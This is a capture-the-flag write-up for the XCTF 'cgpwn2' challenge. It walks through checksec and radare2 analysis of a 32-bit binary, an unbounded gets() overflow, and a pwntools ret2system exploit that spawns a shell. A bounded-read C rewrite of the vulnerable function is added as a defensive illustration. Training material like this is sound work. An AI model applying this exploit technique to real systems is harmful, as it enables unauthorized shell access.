- Check the binary's security mitigations

root@kali:~/ctf/xctf/pwn/easy# checksec easy_008_cgpwn2
[*] '/root/ctf/xctf/pwn/easy/easy_008_cgpwn2'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)
- Look at the strings

[0x08048450]> iz
[Strings]
Num Paddr      Vaddr      Len Size Section   Type  String
000 0x00000700 0x08048700 11  12   (.rodata) ascii echo hehehe
001 0x0000070c 0x0804870c 24  25   (.rodata) ascii please tell me your name
002 0x00000728 0x08048728 38  39   (.rodata) ascii hello,you can leave some message here:
003 0x0000074f 0x0804874f 9   10   (.rodata) ascii thank you

No /bin/sh string is present in the binary.
- Look at the functions

[0x08048450]> afl
0x08048450    1 34           entry0
0x08048440    1 6            sym.imp.__libc_start_main
0x08048490    4 42           sym.deregister_tm_clones
0x080484c0    4 55           sym.register_tm_clones
0x08048500    3 30           entry.fini0
0x08048520    4 45   -> 44   entry.init0
0x080486e0    1 2            sym.__libc_csu_fini
0x08048480    1 4            sym.__x86.get_pc_thunk.bx
0x080486e4    1 20           sym._fini
0x08048562    9 162          sym.hello
0x0804854d    1 21           sym.pwn
0x08048420    1 6            sym.imp.system
0x08048670    4 97           sym.__libc_csu_init
0x08048604    1 96           main
0x080483e0    1 6            sym.imp.setbuf
0x08048410    1 6            sym.imp.puts
0x080483a0    3 35           sym._init
0x08048430    1 6            loc.imp.__gmon_start
0x080483f0    1 6            sym.imp.gets
0x08048400    1 6            sym.imp.fgets

sym.imp.system is imported, and sym.__libc_csu_init, the function that carries the universal gadget, is also present.

- Find the overflow point

In sym.hello there is a call to the dangerous function gets. The name is read with fgets (bounded to 0x32 bytes) into the global obj.name at 0x804a080, but the message is read with gets into the stack buffer var_26h, with no bound at all:

|   `-> 0x080485bc      c704240c8704.  mov dword [esp], str.please_tell_me_your_name ; [0x804870c:4]=0x61656c70 ; "please tell me your name"
|       0x080485c3      e848feffff     call sym.imp.puts
|       0x080485c8      a144a00408     mov eax, dword [obj.stdin] ; obj.stdin__GLIBC_2.0
|                                                                 ; [0x804a044:4]=0
|       0x080485cd      89442408       mov dword [var_8h], eax
|       0x080485d1      c74424043200.  mov dword [var_4h], 0x32 ; '2'
|                                                               ; [0x32:4]=-1 ; 50
|       0x080485d9      c7042480a004.  mov dword [esp], obj.name ; [0x804a080:4]=0
|       0x080485e0      e81bfeffff     call sym.imp.fgets
...
|       0x080485f1      8d45da         lea eax, dword [var_26h]
|       0x080485f4      890424         mov dword [esp], eax
|       0x080485f7      e8f4fdffff     call sym.imp.gets
|       0x080485fc      90             nop
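As an added defensive illustration (this is not the challenge's source, which the writeup does not include): the shape of sym.hello reconstructed from the disassembly above, with the unbounded gets() call replaced by a read that is bounded by sizeof. The buffer sizes 0x32 and 0x26 and the prompt strings come from the disassembly; the helper names, the truncation return codes and the fmemopen-based harness are my own assumptions.

```c
#define _POSIX_C_SOURCE 200809L   /* for fmemopen() */
#include <stdio.h>
#include <string.h>

#define NAME_LEN 0x32   /* size passed to fgets() for obj.name in the disassembly */
#define MSG_LEN  0x26   /* size of the stack buffer (var_26h) that gets() overruns */

static char name[NAME_LEN];       /* stands in for the global obj.name */

/* Bounded replacement for gets(): reads at most bufsz-1 bytes, strips the
 * newline, and drains the rest of an over-long line so it cannot bleed into
 * the next read. Returns 0 on success, 1 if the line was truncated, -1 on EOF
 * with nothing read. */
int read_line_bounded(FILE *in, char *buf, size_t bufsz)
{
    if (fgets(buf, (int)bufsz, in) == NULL) {
        buf[0] = '\0';
        return -1;
    }
    size_t n = strlen(buf);
    if (n > 0 && buf[n - 1] == '\n') {
        buf[n - 1] = '\0';
        return 0;
    }
    /* No newline in the buffer: either EOF ended the line or it was too long. */
    int c, truncated = 0;
    while ((c = fgetc(in)) != EOF && c != '\n')
        truncated = 1;
    return truncated;
}

/* Hardened counterpart of sym.hello: same prompts, same fixed-size local
 * message buffer, but every read is bounded by sizeof, so the saved ebp and
 * return address below the buffer can never be overwritten. */
int hello_hardened(FILE *in)
{
    char message[MSG_LEN];
    puts("please tell me your name");
    read_line_bounded(in, name, sizeof name);
    puts("hello,you can leave some message here:");
    int rc = read_line_bounded(in, message, sizeof message);
    puts("thank you");
    return rc;   /* 1 means the message was cut to fit instead of smashing the stack */
}

/* Harness (assumption, not part of the challenge): feed a constructed input
 * string through hello_hardened() and report its result. */
int hello_hardened_from_string(const char *input)
{
    FILE *in = fmemopen((void *)input, strlen(input), "r");
    if (in == NULL)
        return -2;
    int rc = hello_hardened(in);
    fclose(in);
    return rc;
}

int main(void)
{
    return hello_hardened(stdin) < 0;
}
```

The point of the drain loop is that a bounded fgets() on its own leaves the tail of an over-long line in the stream; without it, the leftover bytes would be consumed by the next prompt. Returning a truncation flag also gives the caller something to log, which is what turns a silent overflow into a visible, detectable event.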
- Build the payload

Combining the analysis above: enter /bin/sh as the name (so it lands in the global buffer at 0x804a080), then use the overflow to return into system with that buffer as its argument:

binsh = 0x804a080
sym = 0x08048420
payload = b'a' * (0x26 + 0x4) + p32(sym) + p32(0) + p32(binsh)
- exp

from pwn import *

conn = process('./easy-008-cgpwn')
binsh = 0x804a080   # global name buffer (obj.name), filled with /bin/sh
sym = 0x08048420    # sym.imp.system
# 0x26 bytes of buffer plus 4 bytes of saved ebp, then system's address,
# a dummy return address for system, and its argument
payload = b'a' * (0x26 + 0x4) + p32(sym) + p32(0) + p32(binsh)
conn.sendlineafter(b'please tell me your name\n', b'/bin/sh')
conn.sendlineafter(b'you can leave some message here:', payload)
conn.interactive()
XCTF easy pwn 008 cgpwn2 solution notes